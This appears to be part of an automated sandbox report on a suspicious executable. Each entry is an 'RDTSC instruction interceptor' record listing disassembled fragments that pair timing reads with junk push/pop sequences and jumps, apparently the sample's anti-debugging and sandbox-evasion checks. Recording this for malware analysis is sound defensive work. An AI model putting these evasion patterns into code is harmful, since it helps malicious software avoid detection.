Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A69A second address: 31A6AA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9558C389F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A6AA second address: 31A6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F7C7 second address: 31F7DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jg 00007F9558C389F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F939 second address: 31F974 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F95588494CEh 0x00000008 jmp 00007F95588494B5h 0x0000000d jmp 00007F95588494B3h 0x00000012 pushad 0x00000013 jl 00007F95588494A6h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31FDDE second address: 31FDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31FF47 second address: 31FF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31FF4D second address: 31FF53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3207C2 second address: 3207C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3207C6 second address: 3207CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326A6D second address: 326ABB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95588494B8h 0x00000008 jmp 00007F95588494B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F95588494D8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F95588494B4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326ABB second address: 326ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F075F second address: 2F0765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F0765 second address: 2F07B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jnp 00007F9558C389FCh 0x00000015 mov edx, dword ptr [ebp+122D2C98h] 0x0000001b mov dl, CFh 0x0000001d lea eax, dword ptr [ebp+124854A1h] 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F9558C389F8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d nop 0x0000003e jp 00007F9558C38A00h 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F0C36 second address: 2F0C4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F95588494A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F0E68 second address: 2F0E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F0F7F second address: 2F0F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F11D0 second address: 2F11D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F12DF second address: 2F12E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F12E3 second address: 2F12E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F12E9 second address: 2F130E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95588494B2h 0x00000008 ja 00007F95588494A6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F130E second address: 2F1312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1312 second address: 2F1318 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1318 second address: 2F1380 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9558C38A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F9558C389F8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 xor edi, dword ptr [ebp+122D2FDEh] 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F9558C389F8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 nop 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jp 00007F9558C389F6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1642 second address: 2F1648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1648 second address: 2F164D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F17C0 second address: 2F17C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32AF7F second address: 32AF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32AF85 second address: 32AFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F95588494BCh 0x0000000d jg 00007F95588494A8h 0x00000013 je 00007F95588494AEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B3A1 second address: 32B3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B3A7 second address: 32B3B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B3B3 second address: 32B3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B3B9 second address: 32B3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B796 second address: 32B7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F9558C38A01h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9558C38A00h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B7C2 second address: 32B7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B7CA second address: 32B7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33023A second address: 330244 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95588494B9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33053D second address: 330541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330541 second address: 3305AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494AAh 0x00000007 jmp 00007F95588494B9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F95588494AAh 0x00000014 jng 00007F95588494A6h 0x0000001a jmp 00007F95588494B8h 0x0000001f jnp 00007F95588494A6h 0x00000025 popad 0x00000026 ja 00007F95588494ACh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 js 00007F95588494A6h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3306F6 second address: 33070A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9558C389F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F9558C389F8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33070A second address: 330710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330710 second address: 330716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33088B second address: 330891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330891 second address: 3308AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F9558C38A07h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3308AD second address: 3308CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95588494B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3308CA second address: 3308E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A04h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3308E2 second address: 330908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jo 00007F95588494A6h 0x00000010 jl 00007F95588494A6h 0x00000016 popad 0x00000017 jng 00007F95588494AAh 0x0000001d push eax 0x0000001e pop eax 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 push edi 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330A51 second address: 330A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C389FCh 0x00000009 popad 0x0000000a push ebx 0x0000000b jnl 00007F9558C389F6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330A6C second address: 330A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b js 00007F95588494AAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007F95588494ACh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330D33 second address: 330D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330D39 second address: 330D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330D43 second address: 330D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330D4B second address: 330D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 330EE1 second address: 330EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331065 second address: 33106B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32FC6D second address: 32FC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 333DC2 second address: 333DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 336819 second address: 33681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33681E second address: 336824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 336824 second address: 336828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 336828 second address: 336833 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 336833 second address: 33684C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9558C389FAh 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 336993 second address: 3369AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F95588494A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33A359 second address: 33A363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9558C389F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33EC1B second address: 33EC3A instructions: 0x00000000 rdtsc 0x00000002 js 00007F95588494A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 ja 00007F95588494A6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33ED6F second address: 33ED75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33ED75 second address: 33ED79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33ED79 second address: 33ED8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jng 00007F9558C389F6h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33ED8F second address: 33ED93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33ED93 second address: 33ED99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33F0BB second address: 33F0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F95588494B4h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F95588494A6h 0x00000014 jnl 00007F95588494A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33F3B1 second address: 33F3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33F3BB second address: 33F3C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33F3C1 second address: 33F3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33F3C6 second address: 33F3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F95588494AFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F150C second address: 2F1510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1510 second address: 2F1532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jns 00007F95588494A8h 0x0000000e push 00000004h 0x00000010 sub dword ptr [ebp+1246C724h], edx 0x00000016 nop 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007F95588494A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1532 second address: 2F1536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F14F1 second address: 2F14F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F14F7 second address: 2F150C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jno 00007F9558C389F6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2F1548 second address: 2F154C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3442B6 second address: 3442BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3442BA second address: 3442C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3442C0 second address: 3442C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3442C7 second address: 3442EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F95588494A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jng 00007F95588494A6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007F95588494ACh 0x00000021 jns 00007F95588494A6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3442EE second address: 3442F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9558C389F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 343549 second address: 34354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 343DDD second address: 343DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jc 00007F9558C389F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 343DEC second address: 343DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34CFF6 second address: 34CFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34B8E3 second address: 34B8EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34B8EA second address: 34B915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F9558C389FBh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 jg 00007F9558C389FAh 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d jne 00007F9558C389FCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34BBE3 second address: 34BC0E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95588494A8h 0x00000008 pushad 0x00000009 jg 00007F95588494A6h 0x0000000f jmp 00007F95588494B8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34BE95 second address: 34BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34BE9B second address: 34BEAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F95588494A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
